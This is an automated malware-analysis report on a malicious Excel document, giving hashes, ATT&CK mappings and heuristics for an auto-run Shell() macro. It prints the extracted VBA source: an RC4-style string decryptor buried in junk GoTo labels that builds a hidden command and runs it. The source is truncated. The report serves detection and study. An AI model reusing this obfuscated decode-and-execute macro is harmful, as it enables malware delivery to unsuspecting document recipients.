Office (OLE) malware analysis — malicious · 84e0ad7ed9101854

MALICIOUS

Office (OLE)

68.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-09-15

MD5: d469be953d3b937753612284fabcbf67 SHA-1: a3d495e8109c1b360e2517273091efa962af517b SHA-256: 84e0ad7ed9101854369ec11f5b02f21f0db3d20c7681b19e7b1df0f3bbf4a4ff

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic further specifies that this execution occurs via the Workbook_Open event, which is a common technique for macro-based malware. The reconstructed command 'Shell (L)' suggests that the macro attempts to execute an external process, likely a downloader for a second-stage payload.

Heuristics 3

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20269 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20269 bytes
SHA-256: `d710de002f845c178bc6fb13e3df948eb491dafc085daa927cc3b482623f66e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub hadbnzxbcmqi() L1 = yHmorma0S("W †”¡ hvvr8--h,", "fJNDKu77e") L2 = yHmorma0S("Óð/", "JJTC4n7Od") L3 = yHmorma0S("Œìg", "ZOUA3UxdQ") L4 = yHmorma0S("‡²Û Ðízzaxz", "OWPTbLVbT") L5 = yHmorma0S("·àctW 65qhx0q", "AsCAhBTU7") L = L1 + L2 + L3 + L4 + L5 Shell (L) End Sub Public Function yHmorma0S(ByVal rDfr8WJTg As String, ByVal lcxx7AFpZ As String) As String On Error Resume Next Dim hcpoBNaQm(0 To 255) As Integer, second As Integer, third As Long, fourth() As Byte GoTo zkqyOpoEuxpNrV: RIVgOOCoPmMuLxBcPMGZQtOnt: gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL" GoTo BESoqzJEixPkDnScdbgQJQvIHYbe sAqVffdiFMTy: GoTo KaehZxMFpQauQbpmU HHjrDgzfCUu: yRLBhqqotfYfJVV = "pskIQAilFimAKg" GoTo gascyityvGYmuvEdQACj uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR: HaLPpebUnkGdBHD = "ShCDNQRvL" GoTo ieqHVrfoLGkmS BESoqzJEixPkDnScdbgQJQvIHYbe: yRLBhqqotfYfJVV = "pskIQAilFimAKg" GoTo uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR zkqyOpoEuxpNrV: zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv" GoTo QhNTnvkQLLKPAAfFrHKNFeHmVRG ieqHVrfoLGkmS: fourth() = StrConv(lcxx7AFpZ, vbFromUnicode) GoTo sAqVffdiFMTy gascyityvGYmuvEdQACj: gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL" GoTo IQGmhiglVdkAb rhjbAdHFnc: zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv" GoTo BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG QhNTnvkQLLKPAAfFrHKNFeHmVRG: uOTcRxGGFJhovammBFI = "LbSDnHkp" GoTo RIVgOOCoPmMuLxBcPMGZQtOnt IQGmhiglVdkAb: uOTcRxGGFJhovammBFI = "LbSDnHkp" GoTo rhjbAdHFnc KaehZxMFpQauQbpmU: HaLPpebUnkGdBHD = "ShCDNQRvL" GoTo HHjrDgzfCUu BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG: For second = 0 To 255 GoTo jyCFwVleNvySzNJtGggGPcEYDb: TdAvZbHNhpfKFGEJuBI: vPsxKUqDrdEbaBjAm = "QqCw" GoTo zzOFHzZBgeLAULCPbJIw RwhdQlcShraZMawIQEVIMmaYRkhD: third = (third + hcpoBNaQm(second) + fourth(second Mod Len(lcxx7AFpZ))) Mod 256 GoTo kqmyBPlnwGBeuMhAuk dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR: LQopKLVtaDSzFZhQCxy = "BmgnQstx" GoTo BOqJpNfFgrlDmI BOqJpNfFgrlDmI: rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN" GoTo DJFQixEFPniLNt DJFQixEFPniLNt: drMOYidGVoIcVLr = "AzEpiphgwzCuSibK" GoTo TcQwssqvhnuLmlB kqmyBPlnwGBeuMhAuk: hcpoBNaQm(second) = second GoTo ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv jyCFwVleNvySzNJtGggGPcEYDb: LiDcUQctIeQbytQZEZf = "OuCDBGelsQ" GoTo TdAvZbHNhpfKFGEJuBI zzOFHzZBgeLAULCPbJIw: drMOYidGVoIcVLr = "AzEpiphgwzCuSibK" GoTo YgsUoTrJVJHBTQQinkvMNjktRy rYexFvbVQUKDLpQBRVYP: LQopKLVtaDSzFZhQCxy = "BmgnQstx" GoTo RwhdQlcShraZMawIQEVIMmaYRkhD TcQwssqvhnuLmlB: vPsxKUqDrdEbaBjAm = "QqCw" GoTo umKnSQynHxoCM YgsUoTrJVJHBTQQinkvMNjktRy: rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN" GoTo rYexFvbVQUKDLpQBRVYP ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv: GoTo dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR umKnSQynHxoCM: LiDcUQctIeQbytQZEZf = "OuCDBGelsQ" GoTo StEyQAQGRQSfwK StEyQAQGRQSfwK: Next second GoTo LeDepjBkHrBHDgvCENlgJLsyRaPvqqp: HAkSUpRVkhPdCC: GoTo mybuayPqPbnQtdouqBShpqAYSwxekD EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov: AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq" GoTo AmCFIAaChRBVMDQbKJxjKhtHpGsw QJNnNZSliEbzrnzP: gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka" GoTo AoxUPtvcvBJenomrOUdGTSjnph LeDepjBkHrBHDgvCENlgJLsyRaPvqqp: ihxADvTjcLuwQtyLIrEe = "FNCV" GoTo EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov BhcdbgQYfvQVmceVvY: fpYYKxZuHVDUGKkZVPif = "YwCyKNxz" GoTo AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk GQoUyNuBTcRxstrw: AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq" GoTo biMnYosvmLo AoxUPtvcvBJenomrOUdGTSjnph: fourth() = StrConv(rDfr8WJTg, vbFromUnicode) GoTo HAkSUpRVkhPdCC AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk: SMqGZtMGwcllkoaSaEQ = "hknfDSLvd" GoTo GQoUyNuBTcRxstrw mybuayPqPbnQtdouqBShpqAYSwxekD: gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka" GoTo BhcdbgQYfvQVmceVvY biMnYosvmLo: ihxADvTjcLuwQtyLIrEe = "FNCV" GoTo fmtJkjzpskImQOlFwnAKtthhHQdF AmCFIAaChRBVMDQbKJxjKhtHpGsw: SMqGZtMGwcllkoaSaEQ = "hknfDSLvd" GoTo KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY: fpYYKxZuHVDUGKkZVPif = "YwCyKNxz" GoTo QJNnNZSliEbzrnzP fmtJkjzpskImQOl ... (truncated)

SHA-256: d710de002f845c178bc6fb13e3df948eb491dafc085daa927cc3b482623f66e6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub hadbnzxbcmqi()



L1 = yHmorma0S("W †”¡ hvvr8--h,", "fJNDKu77e")
L2 = yHmorma0S("Óð/", "JJTC4n7Od")
L3 = yHmorma0S("Œìg", "ZOUA3UxdQ")
L4 = yHmorma0S("‡²Û Ðízzaxz", "OWPTbLVbT")
L5 = yHmorma0S("·àctW 65qhx0q", "AsCAhBTU7")
L = L1 + L2 + L3 + L4 + L5
Shell (L)
End Sub
Public Function yHmorma0S(ByVal rDfr8WJTg As String, ByVal lcxx7AFpZ As String) As String
On Error Resume Next
Dim hcpoBNaQm(0 To 255) As Integer, second As Integer, third As Long, fourth() As Byte
GoTo zkqyOpoEuxpNrV:
RIVgOOCoPmMuLxBcPMGZQtOnt:
gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL"
GoTo BESoqzJEixPkDnScdbgQJQvIHYbe
sAqVffdiFMTy:

GoTo KaehZxMFpQauQbpmU
HHjrDgzfCUu:
yRLBhqqotfYfJVV = "pskIQAilFimAKg"
GoTo gascyityvGYmuvEdQACj
uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR:
HaLPpebUnkGdBHD = "ShCDNQRvL"
GoTo ieqHVrfoLGkmS
BESoqzJEixPkDnScdbgQJQvIHYbe:
yRLBhqqotfYfJVV = "pskIQAilFimAKg"
GoTo uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR
zkqyOpoEuxpNrV:
zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv"
GoTo QhNTnvkQLLKPAAfFrHKNFeHmVRG
ieqHVrfoLGkmS:
fourth() = StrConv(lcxx7AFpZ, vbFromUnicode)
GoTo sAqVffdiFMTy
gascyityvGYmuvEdQACj:
gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL"
GoTo IQGmhiglVdkAb
rhjbAdHFnc:
zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv"
GoTo BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG
QhNTnvkQLLKPAAfFrHKNFeHmVRG:
uOTcRxGGFJhovammBFI = "LbSDnHkp"
GoTo RIVgOOCoPmMuLxBcPMGZQtOnt
IQGmhiglVdkAb:
uOTcRxGGFJhovammBFI = "LbSDnHkp"
GoTo rhjbAdHFnc
KaehZxMFpQauQbpmU:
HaLPpebUnkGdBHD = "ShCDNQRvL"
GoTo HHjrDgzfCUu

BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG:
For second = 0 To 255
GoTo jyCFwVleNvySzNJtGggGPcEYDb:
TdAvZbHNhpfKFGEJuBI:
vPsxKUqDrdEbaBjAm = "QqCw"
GoTo zzOFHzZBgeLAULCPbJIw
RwhdQlcShraZMawIQEVIMmaYRkhD:
    third = (third + hcpoBNaQm(second) + fourth(second Mod Len(lcxx7AFpZ))) Mod 256
GoTo kqmyBPlnwGBeuMhAuk
dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR:
LQopKLVtaDSzFZhQCxy = "BmgnQstx"
GoTo BOqJpNfFgrlDmI
BOqJpNfFgrlDmI:
rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN"
GoTo DJFQixEFPniLNt
DJFQixEFPniLNt:
drMOYidGVoIcVLr = "AzEpiphgwzCuSibK"
GoTo TcQwssqvhnuLmlB
kqmyBPlnwGBeuMhAuk:
    hcpoBNaQm(second) = second
GoTo ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv
jyCFwVleNvySzNJtGggGPcEYDb:
LiDcUQctIeQbytQZEZf = "OuCDBGelsQ"
GoTo TdAvZbHNhpfKFGEJuBI
zzOFHzZBgeLAULCPbJIw:
drMOYidGVoIcVLr = "AzEpiphgwzCuSibK"
GoTo YgsUoTrJVJHBTQQinkvMNjktRy
rYexFvbVQUKDLpQBRVYP:
LQopKLVtaDSzFZhQCxy = "BmgnQstx"
GoTo RwhdQlcShraZMawIQEVIMmaYRkhD
TcQwssqvhnuLmlB:
vPsxKUqDrdEbaBjAm = "QqCw"
GoTo umKnSQynHxoCM
YgsUoTrJVJHBTQQinkvMNjktRy:
rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN"
GoTo rYexFvbVQUKDLpQBRVYP
ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv:

GoTo dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR
umKnSQynHxoCM:
LiDcUQctIeQbytQZEZf = "OuCDBGelsQ"
GoTo StEyQAQGRQSfwK

StEyQAQGRQSfwK:
Next second
GoTo LeDepjBkHrBHDgvCENlgJLsyRaPvqqp:
HAkSUpRVkhPdCC:

GoTo mybuayPqPbnQtdouqBShpqAYSwxekD
EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov:
AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq"
GoTo AmCFIAaChRBVMDQbKJxjKhtHpGsw
QJNnNZSliEbzrnzP:
gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka"
GoTo AoxUPtvcvBJenomrOUdGTSjnph
LeDepjBkHrBHDgvCENlgJLsyRaPvqqp:
ihxADvTjcLuwQtyLIrEe = "FNCV"
GoTo EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov
BhcdbgQYfvQVmceVvY:
fpYYKxZuHVDUGKkZVPif = "YwCyKNxz"
GoTo AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk
GQoUyNuBTcRxstrw:
AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq"
GoTo biMnYosvmLo
AoxUPtvcvBJenomrOUdGTSjnph:
fourth() = StrConv(rDfr8WJTg, vbFromUnicode)
GoTo HAkSUpRVkhPdCC
AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk:
SMqGZtMGwcllkoaSaEQ = "hknfDSLvd"
GoTo GQoUyNuBTcRxstrw
mybuayPqPbnQtdouqBShpqAYSwxekD:
gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka"
GoTo BhcdbgQYfvQVmceVvY
biMnYosvmLo:
ihxADvTjcLuwQtyLIrEe = "FNCV"
GoTo fmtJkjzpskImQOlFwnAKtthhHQdF
AmCFIAaChRBVMDQbKJxjKhtHpGsw:
SMqGZtMGwcllkoaSaEQ = "hknfDSLvd"
GoTo KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY
KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY:
fpYYKxZuHVDUGKkZVPif = "YwCyKNxz"
GoTo QJNnNZSliEbzrnzP

fmtJkjzpskImQOl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.